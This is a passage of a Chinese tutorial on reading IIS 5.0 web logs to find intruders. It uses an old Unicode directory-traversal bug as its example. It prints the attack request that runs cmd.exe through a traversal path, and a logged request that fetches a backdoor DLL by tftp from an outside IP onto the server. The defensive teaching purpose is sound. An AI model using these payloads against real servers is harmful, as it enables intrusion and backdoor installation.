#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 20040419 03:091
#Fields: date time cip csusername sip sport csmethod csuristem csuriquery scstatus cs(UserAgent)
20040419 03:091 192.168.1.26 192.168.1.37 80 GET /iisstart.asp 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)
20040419 03:094 192.168.1.26 192.168.1.37 80 GET /pagerror.gif 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)
 
　　通过分析第六行，可以看出2004年5月19日，IP地址为192.168.1.26的用户通过访问IP地址为192.168.1.37机器的80端口，查看了一个页面iisstart.asp，这位用户的浏览器为compatible;+MSIE+5.0;+Windows+98+DigExt，有经验的管理员就可通过安全日志、FTP日志和WWW日志来确定入侵者的IP地址以及入侵时间。

　　对现在非常常见的SQL注入式攻击，通过对put、get的检查，也可以大概判断是那个页面出了问题，从而修补。
3．HTTPD事务日志的分析

　　Microsoft的IIS 5自公布到现在，被黑客利用的漏洞多不胜数，像.ida/.idq、unicode、WebDavx3和一些未知的漏洞，我们分析日志的目的就是为了分析黑客入侵的行为，对于没有打好补丁包的系统被黑客成功入侵的日志记录分别对应如下。为了给大家介绍一个比较醒目的介绍，专门配置了个“古老”的服务器，用旧漏洞给大家做个演示，很容易触类旁通就懂其它了。

　　（1）unicode漏洞入侵日志记录

　　这个是个非常经典的漏洞了，要找这样的服务器估计得去国外慢慢找了，但是因为它的日志是最经典的一个，所以我们这里特别拿它来做个示范。

　　我们打开IIS5的Web服务的日志文件,日志文件默认位置在%systemroot%\system32\LogFiles\文件夹下，如图１所示是一个典型的Unicode漏洞入侵行为的日志记录，对于正常的Web访问，是通过80端口用GET命令获取Web数据，但通过非法的字符编码可绕过字符验证而得到不应该得到的信息。但补上相应的补丁可堵上此漏洞。如图一所示。

　　我们配合入侵来看下这样的记录：通过下面的编码我们在入侵的时候可以查看目标机的目录文件：
 
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200

　　则日志中会记录下此访问行为：

2004-04-19 08:47:47 192.168.0.1 - 192.168.0.218 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+dir 200 -

　　看到了吗？我们的日志中记录地一清二楚，来自192.168.0.1的攻击者查看我们的目录。下面一行是向我们的机器传送后门程序的日志记录：

2004-04-19 08:47:47 192.168.0.1 - 192.168.0.218 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2061.48.10.129%20GET%20cool.dll%20c:\httpodbc.dll
502 –

　　看到了吧？记录非常详细的，系统里面那个程序在响应都记录了下来，这样我们分析入侵行为就好办了。

　　（2）WebDavx3远程溢出日志记录

　　过去一段时间有名的Wevdavx3漏洞是应用最广泛的，如果系统遭受了此远程溢出的攻击行为，则日志记录如图二所示。